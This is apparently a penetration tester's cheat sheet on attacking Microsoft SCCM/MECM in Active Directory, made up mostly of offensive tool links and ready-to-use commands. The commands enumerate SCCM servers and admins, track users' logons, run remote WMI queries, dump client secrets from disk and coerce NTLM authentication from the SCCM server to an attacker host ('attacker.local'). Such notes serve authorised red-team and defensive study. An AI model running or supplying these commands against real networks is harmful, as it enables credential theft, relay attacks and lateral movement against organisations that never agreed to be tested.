# SCCM Abuse

* <https://www.thehacker.recipes/ad/movement/sccm-mecm>
* <https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a>
* <https://www.hub.trimarcsecurity.com/post/push-comes-to-shove-exploring-the-attack-surface-of-sccm-client-push-accounts>
* <https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/>
* <https://http418infosec.com/offensive-sccm-summary>
* <https://logan-goins.com/2025-04-25-sccm/>

{% embed url="<https://github.com/subat0mik/Misconfiguration-Manager/blob/main/README.md#sccm-attack-matrix>" %}

## Enumeration

Look for CcmExec.exe processes:

```
Cmd > tasklist | findstr CcmExec
```

Search for SCCM servers in LDAP:

```
PV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostName
```

## VNC-like Remote Control (CmRcViewer Abuse)

* <https://www.netero1010-securitylab.com/red-team/abuse-sccm-remote-control-as-native-vnc>
* <https://github.com/netero1010/SCCMVNC>

## Tools

### MalSCCM

* <https://labs.nettitude.com/blog/introducing-malsccm/>
* <https://github.com/nettitude/MalSCCM>

### sccmwtf

* <https://blog.xpnsec.com/unobfuscating-network-access-accounts/>
* <https://github.com/xpn/sccmwtf>

### SharpSCCM

* <https://github.com/Mayyhem/SharpSCCM>
* <https://www.guidepointsecurity.com/blog/sccm-exploitation-evading-defenses-and-moving-laterally-with-sccm-application-deployment/>

Get SMS (Systems Management Server) and SC (Site Code):

```
Cmd > SharpSCCM.exe local site-info
```

List SCCM admins:

```
Cmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>
```

List user latest logons (automated in [sccmhound](https://github.com/CrowdStrike/sccmhound)):

```
Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u snovvcrash@megacorp.local
```

Get resource (server) ID:

```
Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>
```

Execute WMI command on a resource:

```
Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>
```

Grab secrets from SCCM client (locally):

```
Cmd > SharpSCCM.exe local secrets -m disk
```

Coerce authentication from SCCM server (remotely):

```
Cmd > SharpSCCM.exe invoke client-push -t attacker.local
```

### sccmhunter

* <https://github.com/garrettfoster13/sccmhunter/wiki>

Install:

```
$ pipx install -f "git+https://github.com/garrettfoster13/sccmhunter.git"
```

List user latest logons:

```
$ sccmhunter.py admin -u sccm_admin -p 'Passw0rd!' -ip SCCM.megacorp.local
$ get_lastlogon administrator
```